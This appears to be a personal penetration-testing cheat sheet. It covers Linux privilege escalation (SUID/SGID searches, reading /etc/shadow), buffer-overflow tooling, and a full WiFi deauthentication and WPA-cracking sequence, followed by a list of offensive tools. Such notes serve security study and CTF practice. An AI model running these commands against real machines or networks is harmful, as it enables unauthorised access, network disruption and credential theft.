Linux Privilege Escalation

The things that I have used from this page are:

# Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here.

find / -perm -1000 -type d 2>/dev/null

# SGID (chmod 2000) – run as the group, not the user who started it.

find / -perm -g=s -type f 2>/dev/null

# SUID (chmod 4000) – run as the owner, not the user who started it.

find / -perm -u=s -type f 2>/dev/null

 

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID

for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

 

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

LinEnum

./LinEnum.sh -t > kali.txt

Commands

cat /etc/issue

cat /etc/lsb-release

cat /etc/passwd

cat /etc/group

cat /etc/shadow

ps aux | grep root

crontab -l

Port forward

ssh -L 8080:127.0.0.1:80 root@192.168.1.1

ssh -R 8080:127.0.0.1:80 root@192.168.1.1

 

Binary Exploitation

Tools

OllyDbg

Immunity Debugger

gdb

Binary Ninja

 

Stacks

Buffers

Fuzzing

Registers

EAX

ECX

EDX

EBX

ESP

EBP

ESI

EDI

EIP Control the path of Code execution

 

Debug Applications

r2

aaa (Analyse all)

afl (list functions)

pdf @ main (disassemble main)

pdc @ main (decompile main to C-like pseudocode)

 

ldd lists the shared libraries an application links against

ldd /usr/

 

Ruby pattern create tool

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb

 

Ruby: find the offset of the pattern bytes that ended up in EIP

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb

 

Ruby: find the opcodes for jmp esp

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

JMP ESP

 

Shrink Go Binaries

go build -ldflags="-s -w"

and

upx --brute chisel

Tcp dump icmp packets

tcpdump -i eth0 icmp -n

 

Covering Tracks

Metasploit

 

Linux tips and tricks

Updatedb

Update database for mlocate

updatedb

 

Count characters

echo -n asjdflkjalskdjflkjasdfljldkf | wc -c

 

md5sum

echo -n 'asjdflkjalskdjflkjasdfljldkf' | md5sum

Run a command immune to hangups

nohup

Wireless

### Check Config

iwconfig

### Enable Monitor Mode

airmon-ng start wlan0

iwconfig

### Looking for APs

airodump-ng wlan0mon

### Looking for Clients

airodump-ng --bssid <ap> --channel <ap channel> wlan0mon

### Start Recording

airodump-ng --bssid <ap> --channel <ap channel> --showack -w wpa_log wlan0mon

### Deauth

aireplay-ng -0 20 -a <ap> -c <client> wlan0mon

### Crack

aircrack-ng wpa_log-01.cap -w /usr/share/wordlists/rockyou.txt

Links

Exploits

https://www.exploit-db.com/google-hacking-database

 

John The Ripper

https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c

 

Linux Priv Escalation

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

 

Magic Numbers

https://en.wikipedia.org/wiki/List_of_file_signatures

 

Stego Links

https://www.dcode.fr/caesar-cipher

https://www.splitbrain.org/_static/ook/

https://incoherency.co.uk/image-steganography/#unhide

Github tools

0d1n

Door404

Hacking-Tools-Repository

massExpConsole

routersploit

Sublist3r

airgeddon

DorkMe

hashcat-legacy

metagoofil

scavenger

takeover

aron

droopescan

hashstack-server-plugin-jtr

nemesis

SecLists

TheFatRat

AutoSploit

EagleEye

InSpy

osint-scraper

seeker

Trity

badKarma

Eternalblue-Doublepulsar-Metasploit

Leaked

osrframework

SharpHound

wordlist

Bashark

exploitpack-master

linpostexp

Photon

SiteBroker

wpscan

BloodHound

firesheep

Log-killer

PowerSploit

SocialBox

xerxes

Cl0neMast3r

fuxploider

lscript

pywerview

SocialFish

Cortex-Analyzers

Gopherus

machine_learning_security

ReconDog

sshng2john

DarkSpiritz

hackbox

mail-security-tester

RED_HAWK

 

stash.sqlite

 
